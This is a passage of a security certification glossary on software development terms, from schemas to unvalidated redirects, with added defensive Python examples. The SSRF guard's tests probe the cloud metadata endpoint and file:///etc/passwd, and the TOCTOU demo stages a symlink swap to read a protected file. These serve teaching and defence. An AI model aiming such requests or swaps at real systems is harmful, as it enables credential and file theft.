The structure of a database, defining how data is organized, stored, and related within the database system. ## Footnote A structured framework or blueprint describing how data is organized and managed within a database. It defines the tables, fields, relationships, constraints, and other elements of a database, acting as a roadmap for how data is stored and accessed. Schemas are critical for maintaining data integrity, enabling efficient data retrieval and modification, and ensuring that the database structure supports the needs of the applications that interact with it. *For more information, view this lecture on [Databases - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_schema).*
167
# Define: Scope Creep
Uncontrolled changes in a project's scope, leading to potential delays, cost overruns, or diminished quality. ## Footnote A project management term referring to the uncontrolled changes or continuous growth in a project's scope after the project work has started. These changes can occur due to various reasons, such as changes in requirements, miscommunication, or lack of clear initial requirements, and can lead to delays, cost overruns, or quality issues. Managing scope creep involves setting clear project objectives, maintaining effective communication, and closely monitoring changes to the project's scope to ensure alignment with project goals and resources. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Scope_creep).*
168
# Define: Scrum
A framework for agile software development that facilitates collaboration and rapid iteration. ## Footnote A framework for implementing agile software development. Scrum provides a structured yet flexible set of principles, practices, roles, and ceremonies that enable teams to work collaboratively to manage work and produce deliverables in short cycles known as sprints. Central to Scrum is the idea of iterative and incremental development, where requirements and solutions evolve through collaborative effort. Key roles in Scrum include the Product Owner, Scrum Master, and Development Team. Scrum enables organizations to adapt to changing requirements, prioritize work effectively, and deliver high-quality products that meet user needs. It is widely used in software development and increasingly applied in other domains requiring a flexible project management approach. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Scrum_(software_development)).*
169
# Define: SDKs | (Software Development Kits)
SDKs are collections of tools, libraries, and documentation that enable developers to build applications for a specific platform, framework, or service more easily. ## Footnote Examples include mobile OS SDKs, cloud provider APIs, or specialized gaming engines. These kits streamline integration, reducing coding complexity and accelerating development cycles. Properly vetted SDKs ensure performance and security, but poorly maintained or maliciously altered packages can introduce vulnerabilities. Consistent updates, security reviews, and best practices in dependency management help prevent exploit risks and maintain reliable software. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_development_kit).*
170
# Define: Secure Software Development Lifecycle | (SSDLC)
SSDLC integrates security checks and best practices into every phase of software development—from initial design to deployment—reducing vulnerabilities and ensuring safer applications. ## Footnote By incorporating threat modeling, code reviews, and automated testing early, developers catch issues before they become costly to fix. SSDLC phases typically include requirements analysis, design, implementation, testing, and maintenance, with continuous feedback loops. Tools like static/dynamic application security testing and container scanning help enforce security policies. A mature SSDLC fosters a culture where security is everyone’s responsibility, ultimately minimizing the risk of breaches and compliance violations.
171
# Define: Security as Code
Security as Code applies the principles of Infrastructure as Code to automate and version-control security configurations, policies, and checks, ensuring consistency and traceability across environments. ## Footnote By embedding security rules into scripts or configuration files, teams can set up automated scans, access policies, and compliance checks in a repeatable manner. This approach reduces manual errors, speeds up provisioning, and provides an audit trail. Integrated into CI/CD pipelines, Security as Code enforces best practices at every commit. In dynamic cloud-native settings, it improves agility while maintaining standardized defenses.
172
# Define: Servlet
A Java application component that runs on a server to handle requests and generate dynamic web content. ## Footnote A Java-based program that runs on a web server and dynamically generates content for web pages. It is used in web development to create interactive and dynamic web applications. Examples include a servlet that retrieves data from a database and displays it on a web page or a servlet that processes form submissions. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_servlet).*
173
# Define: Session Sidejacking
An attack capturing session cookies through interception to hijack active sessions. ## Footnote A type of attack where an attacker intercepts and hijacks a user's session by stealing their session cookie. It is commonly used in wireless networks, where the attacker may use tools like a packet sniffer to capture unencrypted session cookies. For example, an attacker may use session sidejacking to gain access to a user's online bank account or social media account. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Session_hijacking#Methods).*
174
# Define: Shell Programming
Using a command-line interface or shell to automate tasks and manage systems. ## Footnote The use of a shell to automate tasks and perform complex operations on a computer. It is used in system administration and automation to efficiently manage and manipulate system resources. Examples include shell scripts to automate backups or to monitor system performance. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Shell_script).*
175
# Define: Signed Applet
A Java applet that was digitally signed by its developer, now outdated due to security concerns. ## Footnote A small, downloadable program once used within web browsers that has been digitally signed by the developer to confirm its source and integrity. Due to security concerns, modern browsers have phased out support for applets in favor of more secure and versatile technologies like HTML5 and WebAssembly.
176
# Define: Smart Contract Security
Smart Contract Security focuses on safely developing and auditing blockchain-based contracts, preventing flaws that may lead to financial loss, fraud, or unauthorized transactions. ## Footnote Smart contracts automate digital transactions and logic—such as token transfers or escrow services—on decentralized platforms like Ethereum. Coding errors, logic bugs, or vulnerabilities such as reentrancy and unchecked arithmetic can be exploited by attackers, and stolen funds are rarely recoverable. Security best practices include formal verification, code reviews, reentrancy guards, and checks-effects-interactions ordering. Tools like fuzzers and static analyzers help find issues before deployment. Because deployed contract code and the transactions it has already executed are generally immutable, flaws usually cannot be patched in place, so meticulous security before deployment is paramount. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Smart_contract#Security_issues).*
177
# Define: Software
Instructions and data that enable computers to perform tasks and solve problems. ## Footnote A set of instructions that tell a computer how to perform a specific task or function. It is commonly used to run applications, access the internet, and perform various other tasks on a computer or device. Examples of software include operating systems, web browsers, and productivity suites. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software).*
178
# Define: Software Assurance
The confidence in the security and correctness of software throughout its lifecycle. ## Footnote The process and practice of ensuring that software is developed and operated so that it functions correctly, is free from exploitable vulnerabilities, and does not inflict harm upon the system or data. Software assurance covers the entire software lifecycle, from the initial design to maintenance and decommissioning. It involves various practices such as secure coding standards, code reviews, automated testing, vulnerability assessments, and security audits. The goal of software assurance is to build justified confidence that the software is secure and reliable and that it maintains integrity and availability in alignment with organizational and user expectations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_assurance).*
179
# Define: Software Assurance Maturity Model | (SAMM)
A framework for evaluating and improving the security of software development processes. ## Footnote An OWASP-maintained framework for assessing and improving the security of an organization's software development processes. It is used to measure current maturity against defined practice levels and to identify and prioritize areas for improvement in software security. Examples of organizations that may use SAMM include software development companies and in-house software development teams. *For more information, view this lecture on [Maturity Models - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182137-maturity-models-part-1). Or visit the [OWASP SAMM site](https://owaspsamm.org/).*
180
# Define: Software Assurance Policies and Practices
Organizational strategies for ensuring secure and reliable software through secure development practices and regular updates. ## Footnote The set of organizational guidelines and activities designed to ensure that software is secure and reliable. This includes enforcing secure development methodologies, requiring regular software updates and security patches, and performing security and quality assurance testing throughout the software lifecycle.
181
# Define: Software Bill of Materials | (SBOM)
An SBOM is an inventory listing all components, dependencies, and licenses used in an application, promoting transparency and easier vulnerability tracking. ## Footnote Delivering an SBOM enables organizations to identify which libraries or modules they rely on and whether any contain known security flaws. This visibility aids in rapid updates or patches when vulnerabilities arise. SBOMs also facilitate license compliance and supply-chain risk assessment. Standard machine-readable formats such as SPDX and CycloneDX exist, and the U.S. government (Executive Order 14028, 2021) has pushed adoption for software sold to federal agencies. Maintaining a current SBOM reduces blind spots, helping teams respond quickly to security threats. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_supply_chain).*
182
# Define: Software Composition Analysis | (SCA)
SCA automates the identification, tracking, and management of open-source components in applications, detecting known vulnerabilities and license compliance issues. ## Footnote Developers routinely use third-party libraries for faster coding, but outdated or unpatched dependencies introduce risks. SCA tools scan source code or build artifacts to map external components, matching them against databases like the National Vulnerability Database. When a vulnerability is found, teams can prioritize patching or replacing that library. Proper SCA practices ensure a secure supply chain, mitigate legal complications, and maintain robust software quality. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_composition_analysis).*
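The two cards above describe the same workflow from both ends: an SBOM lists what is in the build, and SCA matches that list against a vulnerability feed. The following added example (not code from the flashcard deck) reads a minimal SBOM in the CycloneDX JSON layout and scans it against a constructed feed. The component names, the feed entries and the `VULN-000x` identifiers are placeholders, not real packages or CVE numbers, and the version comparison is a simplified dotted-numeric one rather than the ecosystem-specific rules a real SCA tool applies.

```python
"""Match components listed in an SBOM against a vulnerability feed.

Added example, not from the flashcard deck. The SBOM follows the CycloneDX
JSON layout (bomFormat, specVersion, components with name and version).
The feed is a constructed stand-in for an NVD-style source; identifiers are
placeholders, not real CVEs.
"""
import json

# Constructed SBOM for a hypothetical application.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "acme-json",  "version": "2.3.1"},
    {"type": "library", "name": "acme-image", "version": "7.0.9"},
    {"type": "library", "name": "acme-pad",   "version": "1.0.0"}
  ]
}
"""

# Constructed feed: affected range is [introduced, fixed), i.e. the fixed
# version itself is no longer vulnerable.
VULN_FEED = [
    {"id": "VULN-0001", "name": "acme-json",  "introduced": "2.0.0", "fixed": "2.3.2", "severity": "high"},
    {"id": "VULN-0002", "name": "acme-image", "introduced": "7.0.0", "fixed": "7.0.9", "severity": "critical"},
    {"id": "VULN-0003", "name": "acme-pad",   "introduced": "1.1.0", "fixed": "1.1.3", "severity": "low"},
]


def parse_version(version: str) -> tuple:
    """Simplified dotted-numeric version key; real tools use per-ecosystem rules."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str, introduced: str, fixed: str) -> bool:
    """True when introduced <= version < fixed."""
    return parse_version(introduced) <= parse_version(version) < parse_version(fixed)


def scan_sbom(sbom_json: str, feed) -> list:
    """Return one finding per (component, vulnerability) match."""
    sbom = json.loads(sbom_json)
    findings = []
    for comp in sbom.get("components", []):
        for vuln in feed:
            if vuln["name"] != comp["name"]:
                continue
            if is_affected(comp["version"], vuln["introduced"], vuln["fixed"]):
                findings.append({
                    "component": comp["name"],
                    "version": comp["version"],
                    "id": vuln["id"],
                    "severity": vuln["severity"],
                    "upgrade_to": vuln["fixed"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_sbom(SBOM_JSON, VULN_FEED):
        print(f"{f['severity'].upper():8} {f['id']}  {f['component']} {f['version']}  -> upgrade to {f['upgrade_to']}")
```

Only `acme-json` is reported: `acme-image` sits exactly at its fixed version and `acme-pad` is older than the introduced version, which is why range boundaries, not just name matching, decide whether a finding is real.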
183
# Define: Software Configuration Management | (SCM)
A process for tracking and controlling software changes to maintain integrity and traceability. ## Footnote The process of tracking and controlling changes to software systems. It is used in software development to ensure that changes to the code do not negatively impact the system's functionality. Examples include using version control systems, establishing change management processes, and conducting impact analysis for new code changes. *For more information, view this lecture on [Configuration Management](https://courses.thorteaches.com/courses/take/cissp/lessons/19180328-configuration-management). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_configuration_management).*
184
# Define: Software Escrow
A legal arrangement where source code is stored with a third party, accessible under specific conditions to ensure continuity of support. ## Footnote The process of depositing a copy of software code with a third party to ensure that the code is available in the event that the software developer becomes unable or unwilling to provide support or updates. It is used in software licensing agreements to protect the user's interests. Examples include using escrow agreements for proprietary software, storing multiple copies of the code in different locations, and regularly verifying the integrity of the code in escrow. *For more information, view this lecture on [Software development methodologies part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code_escrow).*
185
# Define: Software Quality Assurance
A set of activities designed to ensure software meets specified standards for quality and functionality. ## Footnote A process used to ensure that software meets certain standards of quality and functionality. It is used throughout the development and testing of software to identify and fix defects before the software is released to users. Examples of software quality assurance include running automated tests on new code to ensure it meets standards, conducting user acceptance testing to ensure the software meets business requirements, and conducting code reviews to identify potential issues. *For more information, view this lecture on [Software testing - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or view this lecture on [Software testing - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/33748175-software-testing-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_quality_assurance).*
186
# Define: Software System Testing and Evaluation
A structured process to confirm a software system's readiness before deployment. ## Footnote A formalized process in software engineering that involves conducting a series of tests and evaluations to ensure a software system performs according to its design and meets user requirements. These activities include compliance testing, security testing, performance testing, and user testing, among others, to assess the system's readiness for deployment. *For more information, view this lecture on [Software testing - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or view this lecture on [Software testing - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/33748175-software-testing-part-2).*
187
# Define: Source Code
The original code written by programmers in a high-level language before being compiled into an executable program. ## Footnote The human-readable instructions that make up a program or software. Written in a high-level programming language, source code outlines the functions, operations, and structure of a software application. It's the foundational layer that developers interact with, and thus, its quality, clarity, and security have direct implications on the functionality and security of the resulting software. Appropriate measures, such as code reviews and audits, are crucial for identifying potential vulnerabilities and ensuring the reliability of the software. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code).*
188
# Define: Source Code Compare Program
A tool for identifying changes between two versions of a program's source code. ## Footnote A tool that compares two versions of source code to identify differences and changes between them. It is used in software development to track code changes and to facilitate code reviews. Examples include using diff tools, version control systems, and code review platforms.
189
# Define: SQL Injection
An attack method where malicious SQL statements are inserted into an entry field for execution. ## Footnote A type of attack in which user-supplied input is concatenated into an SQL query so that it changes the structure of the query rather than being treated as data. Understanding it is central to application and database security, since a successful injection can bypass authentication, read or modify data the user should never see, and in some configurations execute commands on the database host. Examples include entering a crafted value into a login form to make the WHERE clause always true, or into a search form to retrieve rows from other tables. The primary defense is parameterized (prepared) queries, supported by least-privilege database accounts and input validation. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/SQL_injection).*
190
# Define: SSRF | (Server-Side Request Forgery)
SSRF vulnerabilities let attackers manipulate server-side applications to send unauthorized requests, often targeting internal services or cloud metadata endpoints. ## Footnote By supplying crafted URLs in parameters, adversaries make the server fetch resources on their behalf, reaching hosts that sit behind the firewall or the cloud instance metadata service that hands out credentials. SSRF can uncover credentials, escalate privileges, or pivot within networks. Protective measures include validating destination URLs against an allowlist (re-checking after DNS resolution and after any redirect, since a hostname can resolve to an internal address), network segmentation and egress filtering for the application host, and requiring authentication on internal services. Recognizing SSRF signs is crucial in safeguarding internal infrastructure and reducing attack surfaces. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Server-side_request_forgery).*
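One way to implement the URL validation described above, as an added example (not code from the flashcard deck): the guard refuses non-HTTP schemes, URLs with embedded userinfo, and any destination whose resolved address is private, loopback or link-local (which covers the `169.254.169.254` metadata address). The resolver is injectable so the example runs offline; the hostname-to-address table in the usage note is constructed.

```python
"""Outbound-URL guard against SSRF.

Added example, not from the flashcard deck. Checks the *resolved* address
rather than the hostname string, so a DNS name pointing at an internal
address is refused too. The resolver is injectable for offline testing.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host: str) -> list:
    """Resolve a hostname to IP address strings (uses the network)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_public_ip(ip_str: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str, resolver=default_resolver) -> tuple:
    """Return (ok, reason). ok is True only for a public HTTP(S) destination."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        # "http://trusted.example@169.254.169.254/" reads as trusted to a naive check.
        return False, "userinfo in URL"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP, no lookup needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"resolves to non-public address {addr}"
    return True, "ok (" + ", ".join(addrs) + ")"


if __name__ == "__main__":
    # Constructed hostname table standing in for DNS.
    table = {"internal.corp": ["10.1.2.3"], "example.com": ["93.184.216.34"]}
    for u in ["http://169.254.169.254/latest/meta-data/", "http://internal.corp/admin",
              "file:///etc/passwd", "http://[::1]:8080/", "https://example.com/api"]:
        print(u, "->", check_outbound_url(u, table.__getitem__))
```

Two caveats the check cannot remove on its own: the HTTP client must connect to the address that was validated (otherwise a DNS answer that changes between check and connect, DNS rebinding, reintroduces the gap), and every redirect the client follows must be passed through `check_outbound_url` again.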
191
# Define: Staging Environment
A staging environment is a pre-production setup that closely replicates the live system, used for final testing and quality assurance before code deployment. ## Footnote This environment mirrors production configurations, data shapes, and integrations, enabling teams to catch performance bottlenecks, compatibility issues, or security flaws. Staging reduces release risk by surfacing bugs prior to release. Because staging is usually less monitored and less hardened than production, it should not hold real customer data (use masked or synthetic data) and must be isolated from the public internet to prevent data leaks or accidental user exposure. Thorough testing and sign-off in staging foster smoother launches and higher confidence in deployed solutions. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deployment_environment#Testing).*
192
# Define: Stakeholder
An individual or entity impacted by or interested in the outcome of a decision, project, or policy, such as business leaders, regulatory bodies, or customers. ## Footnote Any individual, group, or organization that has an interest in or can be affected by the outcome of a particular decision, project, or policy. In the context of a security framework or policy, stakeholders may include business leaders, employees, customers, partners, or regulatory bodies. Each stakeholder's needs and concerns must be considered during the development and implementation of security measures to ensure comprehensive protection and compliance with all applicable standards and regulations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Stakeholder_(corporate)).*
193
# Define: Strongly Typed Programming Languages
Languages that enforce strict data type rules for values, enhancing code safety and reliability. ## Footnote Strongly typed languages enforce type rules consistently: a value of one type is not silently reinterpreted or converted into an unrelated type, and an operation that mixes incompatible types is rejected (at compile time or at run time) rather than quietly producing a result. Strong typing is independent of static typing: Java and Rust are strongly and statically typed, while Python is strongly but dynamically typed (`"1" + 1` raises an error instead of converting). C is usually classed as weakly typed because of its implicit conversions and unchecked casts. For security, strong typing closes off a class of bugs where data is misinterpreted as a different type. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Type_system#Strong_and_weak_typing).*
194
# Define: Structured Programming
A programming paradigm that emphasizes clear, hierarchical control structures for program design. ## Footnote A paradigm of designing programs where the flow of control is governed by structured blocks, typically using sequences, selections, and loops. The main aim of structured programming is to enhance the clarity, quality, and development time of a computer program by making use of subroutines, loop control structures, and block structures. Its principles increase the maintainability and reliability of software, reducing the likelihood of bugs and vulnerabilities. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Structured_programming).*
195
# Define: Structured Query Language | (SQL)
A specialized language for managing and manipulating data in relational databases. ## Footnote A programming language used for managing and manipulating data in relational databases. It is used in many industries, including finance, healthcare, and retail, to store and retrieve data from databases. Examples include using SQL to query a customer database for information, to update account balances in a financial system, or to track inventory levels in a supply chain. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/SQL).*
196
# Define: System Development Life Cycle | (SDLC)
A framework guiding the creation and maintenance of systems through several stages. ## Footnote An organized framework that guides the process of creating and maintaining systems. The SDLC encompasses stages from initial planning and analysis through design, development, testing, deployment, and maintenance to ensure the system's efficiency and alignment with user requirements; a secure SDLC adds security activities (threat modeling, secure coding, security testing) to each stage. Examples of SDLC models include Waterfall, Spiral, and Agile. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Systems_development_life_cycle).*
197
# Define: Table Look-up
Searching for a value in a table or database, a common operation in data retrieval and analysis. ## Footnote The process of searching for a specific value or record in a table or database. It is used in various industries, including healthcare, finance, and information technology, to quickly retrieve and analyze data. Examples include searching for a patient's medical history in a hospital database, looking up a customer's account information in a bank's system, and searching for a specific product on an e-commerce website. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Table_(database)).*
198
# Define: Test Environment
A Test environment is a controlled setup where developers and QA teams experiment, debug, and validate software before moving code to staging or production. ## Footnote It may differ from real-world conditions for quick iteration, focusing on unit tests or integration checks. Frequent code deployments identify functionality gaps and confirm bug fixes. By isolating new features or patches, the test environment prevents disruptions to user-facing systems. Comprehensive testing ensures stable releases, curtails regressions, and refines performance metrics ahead of broader deployment cycles. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deployment_environment#Testing).*
199
# Define: Third-party Software
Software created by companies other than the system manufacturer or end-user, which can introduce security risks. ## Footnote Any software product or service that is created and maintained by an entity other than the original manufacturer or the end user. Examples could include additional applications on a computer's operating system, plugins for a web browser, or a specialized tool that is integrated with a larger software suite. Although third-party software can provide useful functionality, it also presents potential security risks, so it's essential to ensure that any such software is reputable, well-maintained, and compatible with existing security measures. *For more information, view this lecture on [Buying software from other companies.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Third-party_software_component).*
200
# Define: Thread
The smallest sequence of programmed instructions that can be managed independently by a scheduler. ## Footnote The smallest unit of execution that an operating system schedules. Threads run within processes and share the same resources, such as memory and file handles, making them lightweight and efficient. Because they share memory, threads that read and write the same data without synchronization produce race conditions, so multithreaded code needs locks or other synchronization to keep data consistent. *For more information, view this lecture on [Hardware architecture- Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/18591300-hardware-architecture-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Thread_(computing)).*
201
# Define: Time-of-Check to Time-of-Use Attack | (TOCTOU)
An exploit that targets the window between verifying a condition and using a resource. ## Footnote A race condition in which a program checks something about a resource (for example, that a path refers to an ordinary file the user may read) and later acts on that resource (opening it), while an attacker changes the resource in between, for instance by replacing the checked file with a symbolic link to a protected one. The fix is to remove the window rather than shrink it: operate on a handle obtained once (open first, then verify the opened descriptor) instead of re-resolving a name, and use atomic operations or locks where the platform offers them. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use).*
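The file-attribute case above, as an added example (not code from the flashcard deck): a check-then-open reader that can be tricked with a symlink swap, beside a version that opens once with `O_NOFOLLOW` and verifies the descriptor it actually holds. Everything runs inside a temporary directory, and the "attacker" swap is invoked deliberately between check and use to make the window visible; it requires a POSIX system.

```python
"""Check-then-open race on a file, and the open-then-verify fix.

Added example, not from the flashcard deck. The swap_hook stands in for an
attacker who wins the race; it is called deliberately so the outcome is
deterministic. Requires POSIX (symlinks, os.O_NOFOLLOW).
"""
import errno
import os
import stat
import tempfile


def read_after_check(path: str, swap_hook=None) -> bytes:
    """Vulnerable: stat the path, then open the same path a second time."""
    st = os.stat(path)                       # follows symlinks, resolves the name
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    if swap_hook:
        swap_hook()                          # attacker acts between check and use
    with open(path, "rb") as f:              # resolves the name again
        return f.read()


def read_verified(path: str, swap_hook=None) -> bytes:
    """Fixed: open once without following symlinks, then verify the descriptor."""
    if swap_hook:
        swap_hook()                          # attacker may act at any time; it no longer matters
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)                    # describes what was actually opened
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            raise PermissionError("unexpected file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:           # takes ownership of fd
        return f.read()


def demo() -> tuple:
    """Return (data read by the vulnerable reader, outcome of the fixed reader)."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")   # what the user is allowed to read
        secret = os.path.join(d, "secret.txt")   # what the attacker wants read
        with open(public, "wb") as f:
            f.write(b"harmless")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def swap():
            os.remove(public)
            os.symlink(secret, public)       # public.txt now points at secret.txt

        leaked = read_after_check(public, swap)

        os.remove(public)                    # reset for the second run
        with open(public, "wb") as f:
            f.write(b"harmless")
        try:
            fixed = read_verified(public, swap)
        except OSError as exc:
            fixed = "refused (" + errno.errorcode.get(exc.errno, str(exc.errno)) + ")"
        return leaked, fixed


if __name__ == "__main__":
    leaked, fixed = demo()
    print("vulnerable reader returned:", leaked)
    print("fixed reader:", fixed)
```

The vulnerable reader returns the secret; the fixed reader refuses (on Linux the open fails with `ELOOP`) because `O_NOFOLLOW` rejects a symlink at the final path component and `fstat` judges the object that was opened, not a name. `O_NOFOLLOW` does not cover symlinks in parent directories, so for untrusted directory trees the usual extension is to open the directory first and use the `dir_fd` form of `os.open` relative to it.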
202
# Define: Tuple
An ordered set of elements, often representing a database record, where access may be regulated for data protection. ## Footnote A tuple is an ordered collection of elements that typically represents a single row in a relational database table. Each element, or attribute, of the tuple corresponds to a column of the table. In terms of security, tuples are significant as database access control policies often regulate operations based on tuple attributes to ensure data integrity and confidentiality. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Tuple).*
203
# Define: Two-phase Commit
An atomic commitment protocol in distributed computing ensuring a transaction either commits on every participating system or on none. ## Footnote A protocol in which a coordinator drives a transaction spanning several systems through two phases. In the prepare phase the coordinator asks every participant to vote; a participant that votes to commit must first make its changes durable so it can honor that vote even after a crash. In the commit phase the coordinator records the outcome and tells every participant to commit (only if all voted yes) or to roll back. The weakness is that it blocks: a participant that has voted yes cannot finish on its own if the coordinator fails before announcing the decision, so it holds its locks until the coordinator recovers. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Two-phase_commit_protocol).*
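The exchange described above, as an added example (not code from the flashcard deck): an in-memory coordinator and participants exchanging the conventional PREPARE / VOTE_COMMIT / VOTE_ABORT / COMMIT / ABORT messages, with one participant configured to vote no so the abort path is visible. The participant objects, their `can_commit` flag and the in-memory logs are constructed for the demonstration.

```python
"""Two-phase commit simulation: one coordinator, several participants.

Added example, not from the flashcard deck. Participants and their logs are
in-memory stand-ins; in a real system each log write is durable before the
corresponding message is sent.
"""


class Participant:
    def __init__(self, name: str, can_commit: bool = True):
        self.name = name
        self.can_commit = can_commit      # constructed flag: vote yes or no
        self.log = []                      # (txn_id, record) pairs
        self.state = "INIT"

    def prepare(self, txn_id: str) -> str:
        """Phase 1: do the work, make it durable, then vote.

        After VOTE_COMMIT the participant must be able to commit later even if
        it crashes and restarts, which is why the vote is logged first.
        """
        if not self.can_commit:
            self.state = "ABORTED"
            self.log.append((txn_id, "VOTE_ABORT"))
            return "VOTE_ABORT"
        self.state = "PREPARED"
        self.log.append((txn_id, "VOTE_COMMIT"))
        return "VOTE_COMMIT"

    def decide(self, txn_id: str, decision: str) -> None:
        """Phase 2: apply the coordinator's global decision."""
        self.state = "COMMITTED" if decision == "COMMIT" else "ABORTED"
        self.log.append((txn_id, decision))


class Coordinator:
    def __init__(self, participants):
        self.participants = list(participants)
        self.transcript = []               # (sender, receiver, message), for inspection
        self.log = []

    def run(self, txn_id: str) -> str:
        """Drive one transaction to a global COMMIT or ABORT and return it."""
        votes = {}
        for p in self.participants:
            self.transcript.append(("coord", p.name, "PREPARE"))
            vote = p.prepare(txn_id)
            self.transcript.append((p.name, "coord", vote))
            votes[p.name] = vote
            if vote == "VOTE_ABORT":
                break                      # one no vote settles the outcome
        unanimous = len(votes) == len(self.participants) and all(
            v == "VOTE_COMMIT" for v in votes.values())
        decision = "COMMIT" if unanimous else "ABORT"
        # The decision is logged before any participant hears it. If the
        # coordinator died between this line and the loop below, prepared
        # participants would sit blocked until it came back: the known
        # weakness of two-phase commit.
        self.log.append((txn_id, decision))
        for p in self.participants:
            self.transcript.append(("coord", p.name, decision))
            p.decide(txn_id, decision)
        return decision


if __name__ == "__main__":
    c = Coordinator([Participant("db1"), Participant("db2", can_commit=False), Participant("db3")])
    print("outcome:", c.run("txn-42"))
    for msg in c.transcript:
        print("  %s -> %s: %s" % msg)
```

With `db2` voting no, the coordinator stops polling, logs ABORT, and tells all three participants to abort; `db3` was never asked to prepare and simply records the abort. Change `can_commit` back to `True` and the same code commits everywhere.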
204
# Define: Unvalidated Redirect
An unvalidated redirect vulnerability arises when a web application redirects users to a URL taken from user input (for example a `next` or `returnUrl` parameter) without verifying it, letting attackers build phishing links that start on a trusted domain. ## Footnote By manipulating the parameter, adversaries trick victims into following legitimate-looking URLs that land on a site under the attacker's control, where credentials can be harvested or malware served, and the trusted domain in the link defeats the user's judgement and some URL filters. Mitigations are to avoid user-controlled redirect targets where possible, otherwise to accept only same-site relative paths or hosts on an explicit allowlist, and to reject the protocol-relative (`//evil.example`) and scheme-less forms that browsers still treat as off-site. Preventing unvalidated redirects preserves brand reputation and removes a common hop in phishing and OAuth token-theft chains. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4).*
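One way to implement the allowlist check described above, as an added example (not code from the flashcard deck): it returns the requested target only when it is a same-site path or an HTTPS URL to an allow-listed host, and otherwise falls back to a default. The `ALLOWED_HOSTS` entries and the `/dashboard` default are hypothetical.

```python
"""Safe handling of a ?next= redirect parameter.

Added example, not from the flashcard deck. Accepts same-site relative paths
or HTTPS URLs to allow-listed hosts and refuses protocol-relative,
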